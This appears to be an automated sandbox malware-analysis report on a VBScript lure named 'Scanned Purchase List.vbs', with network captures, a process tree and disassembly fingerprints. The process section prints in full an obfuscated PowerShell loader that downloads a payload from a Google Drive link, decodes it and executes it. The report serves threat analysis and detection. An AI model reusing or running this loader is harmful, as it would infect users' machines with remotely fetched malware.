                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Content-Security-Policy: script-src 'report-sample' 'nonce-g9BJC--5qyrzrDuLzJ-vSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Cross-Origin-Opener-Policy: same-origin
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                25192.168.2.449768142.250.185.1424437444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-10-01 05:47:42 UTC121OUTGET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:47:43 UTC1319INHTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:47:42 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Content-Security-Policy: script-src 'report-sample' 'nonce-STaQi4Tp1l2-pgMQZlo0OQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Cross-Origin-Opener-Policy: same-origin
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:01:45:34
                Start date:01/10/2024
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned Purchase List.vbs"
                Imagebase:0x7ff79a000000
                File size:170'496 bytes
                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:1
                Start time:01:45:36
                Start date:01/10/2024
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#selvhrdendes Opdrager Hjremarginerne Dundertaler #>;$Usolidere43='Councilmen';<#Herredmmer Plasmagenic Jdindernes suttene Korjambisk decelerationsbanen Udskejelser #>;$Dimit=$host.PrivateData;If ($Dimit) {$Pantagraphic++;}function doublecrossing($spisevgringer253){$Driftsbesparelse=$Gucki+$spisevgringer253.Length-$Pantagraphic;for( $Crunchingly=3;$Crunchingly -lt $Driftsbesparelse;$Crunchingly+=4){$Nikeno+=$spisevgringer253[$Crunchingly];}$Nikeno;}function tramelling($Perhapses){ & ($boligydelsen) ($Perhapses);}$sortkldt=doublecrossing 'talM ,fospazLociDatls il Kna D,/Asy5 ke.Ind0Res Lo,(svaW oiHornfordf noanswA ss sm CoN,jrT s. Art1Epa0so,.vet0,ie;P r shoWpasi enA.y6D g4Hav;C b seexLtr6De 4 lo;Mis oerChev ,r: Ud1Ans2tra1Fer.Ri.0Unl)Les ChaG FrestocNe kUndo Ar/sor2Mur0.au1Lok0 F 0Zef1Pso0 Do1 Pr IdFEmiiVenrTegeModf umocanx a/E.i1Out2Ung1Mos. n0 A. ';$Panservaaben=doublecrossing ' s UDiss PaE AsR.lt- Unap lGTapeBjlnOlet r ';$Encheson=doublecrossing 'Gyrh aatP ntPespKnas Ti:Beh/ i/Le d T.rFrai RevFrieImp. s g Inosl.oMosg Jal steHys.RencAngomidmUn,/ vuPercWhe? Kne ndx stp ero rrct tplu=Pred H,ostiwpannsy,lIm oBriaEssd il&KaliF,idE f=h s1LanO DuQTyrEB rlAcc7OveU ,aGsulOPipyUncKsids VaPDecd ,aR npJ Gr9Dis1 eng L wH mqst os,rI ifV T NLinNindRLinsJea6stiPOmbVFur9 ti4Bri ';$Dioxid=doublecrossing ' s.>Fib ';$boligydelsen=doublecrossing 's aistoeAppxs m ';$Manducation='springklaps';$Drinksenes='\Paralytical.Nap';tramelling (doublecrossing 'Otu$Ar gstjl,hooEf.bCl,aCavlBev:Gerc R o Fiu RinepotsaceCamrEvaaLnorBregGr u eelimsVis=Egy$WooeJ.nn olvs l:MedaDmppTw.pPred aaasyrtMaravu.+ yk$ M DHipr eliKilnpeakskasNonepitnPhaeTilsFur ');tramelling (doublecrossing ',or$sozg emlD ro KebA taUnilPra:AcrsI vtImpyG,irE otBindManyRookFa kU ceButr Ln=Pol$ AtEAman.ykcBilhIndes.hsKeeoJobn Pa.Tyns ekpsy,lsleiAb tHav(Bil$ svD.eyiUngoCruxPleiDord To) sc ');tramelling (doublecrossing 'Maw[DifNCamestrtTer.kilsV,le sir Mev FaiBescDaweFerPTheoHypiUndnso.tNskM s.a M ns,maspegsameRidr K ] a: on:Na.sdove ApcHabuPa.r ,riJart apyskuPst,rA coskatA koF,lcAn o NelNon n= Nu kv[ ndNR aeQuatCo . VasPite BacstousynrA gisartLgtyOplPNerrTrao TrtBndoGlucHe oCyclAlaTR gyEkspsa e d]Avo:F r: phTNonlMarsP,e1s o2Idi ');$Encheson=$styrtdykker[0];$Northwardly=(doublecrossing ' Ou$sogGs mLPlaONonBTerAGlaL Or:steLIntIs oGUn H ktT p,a MtGForesl.6 Ma8s,v=optnAarE BawPar-TheostaBMilJIfaE HoC UvTnon EarsF rYLa.s.potFeeED lMHov.DelNK aE untFor.OvewJonEA,sbOplCGelL KeIsenePs nAndT sp ');tramelling ($Northwardly);tramelling (doublecrossing ' Cr$DiaLRe iDkfgL phEmutAfkaRidgEnfeFre6Til8Cir.MarHOvaePa asa.dVapestar sesFag[ un$ConPToraVo n D sBl eConrP lv TuaRa ashob Ade AnnCem].as= p$At s Kao.ntrPhotFikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohInceKorsCicoaftnser,sep$C,aB EmiPunl Asl s aU raNonn ineBaltA asD.t) su ';$Billaanets=$counterargues;tramelling (doublecrossing ' or$BilGBomLEneoB tbslaaBorlThr:r taPolP InoBo.CKa rIndiFugs riiTemA RaRElsY.al=Bar(T lTsquemars stT.ar-H.aP DraRabTRekHUns Ve $FisbOphIfreLM.nL saa LoAProNslaEsuktValsUni) h ');while (!$Apocrisiary) {tramelling (doublecrossing 'But$kurgAn,lLabo eb omaUnplHay:Rare tuuRovpQuah,oro P r BebKopiUndaMsslMaa=End$PretskorT auAc e ca ') ;tramelling $semicolloquially;tramelling (doublecrossing 'Ejesne tAn a inrHeatCol-BrassamlUnde epeNatpDag Ove4Des ');tramelling (doublecrossing 'Hil$ Img flsk oConbmisaDenlFra:MasA edpEnaoEkscPr,rBesiYo.sCrei Coa Vgr LuyA t=sun(K lTIngeAngsF,etGen- F.PProajawt M,hUrt Uni$sa Bskai VelDefls aaD pa O n oeMu.tG as wh)ste ') ;tramelling (doublecrossing ' W.$ m g KolUddoArab onaAu l re: spEs unNa.est rsikg.isieftmI fnDdsg HjdstueN n=Ord$ TygCollNaroTrubLeuaGullLyd:FalTP,oiTypdA bsA phFo.o scr U,i ResBisoGran.omt Wase b+ Di+fo %Dre$EnhsOmvtAs,yOpdr astEpidDy,yFl.kLyckFale efrUnd..emcManospruFusnDyrtsk, ') ;$Encheson=$styrtdykker[$Energimngde];}$Arthriticine=282118;$sorteringsordenen=30262;tramelling (doublecrossing 'Pl.$WabgCenlslaoLeubFraa jal t : g.Osi.mBets ortGloy U.rProtPseeHyptEpi slv=Bai st G Alesutt.xa-sacC PtoPosnP ntHa.eLu.n cetC.e Br$ .tBen,i amlPral leaBliasarnOldeMontEkss Di ');tramelling (doublecrossing 'sty$salg Auls po ekb abaph lOpe:,arsso.t pioBard CodGene ajrFlikVano PrnspigE ee phnU d Ext=E e mi.[Mi sTepyFlysOlitTaveKipm.ol. emCspyosannFunv HaeAmpr CotOm ]B,g:Beg:VouFD,nr.etoUnwmscrBsc aKapsLuneUpp6Pis4 Hos TwtIntrCh iAfgnraagTer(Kam$EmpOB.omAmbssket piyJu r,ret R eApptAld) sl ');tramelling (doublecrossing 'Fi $,mmgjo l skoPosb O.asunl i:by,NKo,o C tD ma.xmrsc iBoazKomisarnRefgB.a Ma=Euc Unc[ HasD nyTemsBettBiseFlamM k.RomTI seDisxambtBlo.WigEOs nDigcBabo Pad PliAfsnTimgTik],kr:De : slAFars ReCUnuIsamI.ta. H,G .reEsttConsCymtU ora,visa nHoggInf(ye $Fr s ngt A,oBledAardRe e MorInskVagoF,dnMicgAlleCatnall) Re ');tramelling (doublecrossing 'Mya$ eg ypl,kooU sb.oua.hol gn:TreC,ighsweuLancCsuk ,oyse.=Lio$Mi NPasoO.ltBloa C ra si DizAfkiNo n.argskr.AmpsNymu U,b sksGr tTv,rDiviseenmaagFor(T.e$,arA FurstytIndhBelrTiliNontGenis.lc nistyn,tiePha,bin$ ous,eaoKonr T,tMeleKokrHo iLinnEntgTilsshaoBarr MadKroe Ben AceNo n T ) ka ');tramelling $Chucky;"
                Imagebase:0x7ff788560000
                File size:452'608 bytes
                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                General

                Target ID:2
                Start time:01:45:36
                Start date:01/10/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7699e0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                Disassembly

                Reset < >

                  Executed Functions

                  Function 00007FFD9BA0546C Relevance: .5, Instructions: 501COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.3015046778.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_7ffd9ba00000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2fa552a4bae80145d0ccf13562531830574b965e12a52b7af6243e7c0fc6d5a3
                  • Instruction ID: 40a17bd1f2cf03c554d884909a3ba9eb9b02f1f64ade9c625970a7d23421298d
                  • Opcode Fuzzy Hash: 2fa552a4bae80145d0ccf13562531830574b965e12a52b7af6243e7c0fc6d5a3
                  • Instruction Fuzzy Hash: 6CF1C330A18A4D8FDF98EF5CC8A5EA977E1FF69300F15016AD449D7296CA75EC41CB80
                  Function 00007FFD9BAD4580 Relevance: .4, Instructions: 414COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.3015383948.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_7ffd9bad0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 567757185da8e40f4094093cf194ec2bdc5c96150c6ade1b65ca054d489e99c2
                  • Instruction ID: 137232d11ada13b2dfb79c6df4664d3d624693051ab6d1cea208070e189982d8
                  • Opcode Fuzzy Hash: 567757185da8e40f4094093cf194ec2bdc5c96150c6ade1b65ca054d489e99c2
                  • Instruction Fuzzy Hash: 5EC13822B0FA8E0FE7A99768586557937D1EFC2350B0A02BEE45EC71F3DE58AD018341
                  Function 00007FFD9BAD46C4 Relevance: .1, Instructions: 97COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.3015383948.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_7ffd9bad0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 286f9460c10d74783703513774cba5f0bbb653c34d6c6bd9303917a4d1f47a2c
                  • Instruction ID: ec68e6a846414bf40f25bcd0a49f430c26aa3d7aba21d3573359fbc44891dc9a
                  • Opcode Fuzzy Hash: 286f9460c10d74783703513774cba5f0bbb653c34d6c6bd9303917a4d1f47a2c
                  • Instruction Fuzzy Hash: 8C212622F0FA8E0FE3B9A76854B517566C2EFD2250B5A01BEE45DC32F3ED59AC058301
                  Function 00007FFD9BAD19AF Relevance: .1, Instructions: 80COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.3015383948.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_7ffd9bad0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dcaad8c49f45e48d9fd0c86c398487c215e26b91c6f0253bb0f648b85456ed1c
                  • Instruction ID: e3ea2dcd612b9359c1a8bf95b664ad4f09875496098b621d73b21528e7f62737
                  • Opcode Fuzzy Hash: dcaad8c49f45e48d9fd0c86c398487c215e26b91c6f0253bb0f648b85456ed1c
                  • Instruction Fuzzy Hash: 42213052B0FAC90FE761A76818692A86BD1DFA6650B1940FFC09CCB1F3DC481C0A8302
                  Function 00007FFD9BAD71F5 Relevance: .1, Instructions: 53COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.3015383948.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_7ffd9bad0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d751f49ccb9a2b8acb5174ecd18b17398cd9b182ff27c72d7c1f3b784aff7048
                  • Instruction ID: 615b303c4bbbbaa05ad55d43a3f62763639203203f4a7efe962ef68f0c48c620
                  • Opcode Fuzzy Hash: d751f49ccb9a2b8acb5174ecd18b17398cd9b182ff27c72d7c1f3b784aff7048
                  • Instruction Fuzzy Hash: DE01F922F0E6C90FEB69EB9C50605A8BBD2EF99310F4401BEE48DD7093D9545D008350
                  Function 00007FFD9BA041E5 Relevance: .0, Instructions: 49COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.3015046778.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_7ffd9ba00000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                  • Instruction ID: c20e5037b83526d5eba0af566b53653c9fee128c971c83e7493f47a61ebd04fb
                  • Opcode Fuzzy Hash: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                  • Instruction Fuzzy Hash: A801843020CB0C4FD748EF0CE051AA5B3E0FB95324F10056EE58AC36A5DA22E882CB41
                  Function 00007FFD9BAD7224 Relevance: .0, Instructions: 36COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.3015383948.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_7ffd9bad0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 18397aec6e3f5d815dae4027e98da09332de3eccf2af6b4d60db815d8c538be3
                  • Instruction ID: dbed43c6979711c3e7889f96e90e3a641db667ba98501d58d25167dea6c3be27
                  • Opcode Fuzzy Hash: 18397aec6e3f5d815dae4027e98da09332de3eccf2af6b4d60db815d8c538be3
                  • Instruction Fuzzy Hash: C9F0B432F0E6880FEB55EBA854655E8BBA1EB59354F0401BFD09CD2193E82518418760

                  Non-executed Functions

                  Function 00007FFD9BA04BA8 Relevance: 5.3, Strings: 4, Instructions: 271COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.3015046778.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_7ffd9ba00000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: +f[$I$OE^I$^
                  • API String ID: 0-54979186
                  • Opcode ID: 430638dcd7adb77868906c438a980d7bf150a644358977d60defe4b414f852c5
                  • Instruction ID: 95f998be264722fa46941b39ce111e72b6bda05d09b4114ba89203bc8c532063
                  • Opcode Fuzzy Hash: 430638dcd7adb77868906c438a980d7bf150a644358977d60defe4b414f852c5
                  • Instruction Fuzzy Hash: 41819F63B0F7D64BF7224B6858760B53F70FF53125B0A42FBC4D58A0F39D4529068261